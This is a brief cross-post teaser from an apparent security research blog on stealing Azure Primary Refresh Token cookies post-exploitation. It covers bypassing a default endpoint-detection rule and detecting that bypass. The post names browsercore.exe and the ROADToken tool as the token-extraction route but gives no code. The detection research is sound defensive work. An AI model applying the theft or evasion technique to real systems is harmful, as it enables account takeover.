FalconFriday — Stealing and detecting Azure PRT cookies — 0xFF18

Post-Image

FalconFriday — Stealing and detecting Azure PRT cookies — 0xFF18

TL;DR: There is a lot of great research available on how to obtain an Azure Primary Refresh Token (PRT) cookie, post-exploitation. This post outlines a way to bypass the default detection in MDE and how to detect this bypass.

Azure PRTs have been covered extensively in research from @_dirkjan, but also by Lee Christensen in this post. In essence, there are two ways to make Windows give you a PRT cookie. The ‘easy’ way is to use browsercore.exe. This executable reads the nonce from stdin and gives back the PRT cookie on stdout. This is how, for example, the Chrome plugin can do SSO with your AzureAD account. The tool ROADToken from @_dirkjan does exactly this.

Cross post from medium.com, please read the full article here:

https://medium.com/falconforce/falconfriday-stealing-and-detecting-azure-prt-cookies-0xff18-96efce74ce63

Direct link to our Github page:

https://github.com/FalconForceTeam/FalconFriday